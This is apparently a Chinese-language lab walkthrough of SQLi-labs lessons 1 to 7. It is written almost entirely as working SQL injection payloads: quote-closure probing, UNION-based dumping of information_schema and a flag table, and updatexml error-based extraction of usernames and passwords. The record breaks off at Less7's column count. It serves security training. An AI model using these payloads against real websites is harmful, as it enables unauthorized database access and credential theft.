SQL-labs

less1

尝试?id=1

?id=1‘ 报错

?id=1’–+正常（+URL解码为空格）

说明可以用注释符绕过

判断字段数

?id=1’ order by 3–+正常

union注入

?id=-1’ union select 1,2,3–+

爆库名

?id=1’ and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata–+

爆表名

?id=1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables–+

?id=1’ and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag–+

Less2

?id=1”报错，说明参数未被引号包裹，判断是数字型

?id=1 –+正常

判断字段数

?id=1 order by 3–+正常

union注入

爆库名

?id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata–+

爆表名

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables–+

?id=1 and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag–+

Less3

?id=1”正常，参数可能被引号包裹

?id=;/‘;[]’强制触发数据库的语法错误，从错误信息中提取关键字符，推断闭合方式

可能的SQL语句

SELECT * FROM table WHERE id=(‘1’) LIMIT 0,1

SELECT * FROM table WHERE id=(‘;/‘;[]’’) LIMIT 0,1

?id=1’) order by 3–+正常

union注入

剩余步骤同Less1、Less2

Less4

?id=1”报错

推测原始闭合”)

?id=1”) order by 3–+正常

?id=1”) and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata–+

?id=1”) and 1=2 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=’ctftraining’–+

?id=1”) and 1=2 union select 1,2,group_concat(flag) from ctftraining.flag–+

Less5

?id=1’

闭合方式'

?id=1’ ORDER BY 3–+

增至4后报错

判断3列

报错注入

?id=1’ and updatexml(1,substring(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1,99),3) –+

回显XPATH syntax error: ‘~ctftraining,information_schema,’

?id=1’ union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema=”ctftraining”) ,0x7e),3)–+

回显XPATH syntax error: ‘flag,news,users‘

?id=1’ union select updatexml(1,concat(0x7e, left((select(group_concat(flag)) from ctftraining.flag) ,25),0x7e),3)–+

?id=1’ union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from ctftraining.flag) ,25),0x7e),3)–+

Less6

?id=1”报错

?id=1” –+ 正常

报错注入

爆数据库名

?id=1” and updatexml(1,concat(0x7e,database()),3)–+

回显XPATH syntax error: ‘~security’

爆表名

?id=1” and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=”security”)),3)–+

回显XPATH syntax error: ‘~emails,referers,uagents,users’

爆字段名

?id=1” and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”)),3)–+

回显XPATH syntax error: ‘~id,username,password’

?id=1” and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 4,1)),3)–+

Less7

?id=1’

显示You have an error in your SQL syntax

表明原始查询中可能使用了单引号来包裹字符串

?id=1”

显示You are in…. Use outfile……

?id=1’) and 1=1–+报错，说明 ') 这种闭合方式不完全正确

?id=1’)) and 1=1–+正常，说明 ')) 这种闭合方式是正确的

判断字段数

?id=1’)) order by 3–+